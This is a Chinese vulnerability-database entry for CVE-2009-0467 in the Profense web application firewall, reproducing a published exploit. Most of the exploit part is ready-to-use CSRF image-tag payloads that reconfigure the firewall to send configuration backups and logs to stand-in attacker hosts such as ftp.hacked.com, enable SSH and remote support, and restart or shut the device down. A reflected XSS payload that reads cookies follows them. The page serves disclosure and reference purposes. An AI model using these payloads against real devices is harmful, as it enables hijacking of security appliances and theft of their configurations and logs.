Armorlogic Profense 'proxy.html'跨站请求伪造和跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117312 漏洞类型 跨站脚本
发布时间 2009-01-29 更新时间 2009-02-12
CVE编号 CVE-2009-0467 CNNVD-ID CNNVD-200902-234
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7919
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-234
|漏洞详情
ProfenseWebApplicationFirewal时一款网站防火墙。ProfenseWebApplicationFirewall2.6.2和2.6.3版本中的proxy.html存在跨站脚本攻击漏洞。远程攻击者可以借助拒绝登录管理操作中的代理服务器参数,注入任意的web脚本或HTML。
|漏洞EXP
Written By Michael Brooks
Special thanks to str0ke!

Affects: Profense Web Application Firewall XSRF and XSS
Version: 2.6.2
download http://www.armorlogic.com/download_software.html

"Defenses against all OWASP Top Ten vulnerabilities"
 Too bad it doesn't defend its self against all of these vulnerabilities....


Chaning configuration:
DNS, SMTP,  NTP servers.
Set a (malcious) remote FTP server or SCP server to backup (steal)
configuration files.   This could be used to steal the configuraitons.
Set a remote syslog server to steal the logs
Enable SSH
Enable SNMP
<img src=https://10.1.1.199:2000/ajax.html?hostname=profense.mydomain.com&gateway=10.1.1.1&dns=10.1.1.1&smtp=10.1.1.1&max_src_conn=100&max_src_conn_rate_num=100&max_src_conn_rate_sec=10&blacklist_exp=3600&ntp=ntp.hacked.com&timezone=CET&syslog=syslog.hacked.com&syslog_ext_l=4&snmp_public=public&snmp_location=&contact=admin%40mydomain.com&ftp_server=ftp.hacked.com&ftp_port=21&ftp_login=user&ftp_passwd=password&ftp_remote_dir=%2Fhijacked_log&scp_server=scp.hacked.com&scp_port=22&scp_login=admin&scp_remote_dir=%2Fhijacked_log&ftp_auto_on=on&scp_auto_on=on&ssh_on=on&remote_support_on=on&action=configuration&do=save>
Apply new configurations:
<img src=https://10.1.1.199:2000/ajax.html?action=restart&do=core>

Add a proxy:
<img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>

Turn off the Proface machine:
<img src=https://10.1.1.199:2000/ajax.html?action=shutdown>

Force the Proface server to ping:
<img src=https://10.1.1.199:2000/ajax.html?action=ping&ip=10.1.1.1>
Could be used to nofiy the attacker that the attack succeeded.

reflective xss:
https://10.1.1.199:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>

# milw0rm.com [2009-01-29]
|参考资料

来源:BID
名称:33523
链接:http://www.securityfocus.com/bid/33523
来源:MILW0RM
名称:7919
链接:http://www.milw0rm.com/exploits/7919
来源:SECUNIA
名称:33739
链接:http://secunia.com/advisories/33739
来源:OSVDB
名称:51659
链接:http://osvdb.org/51659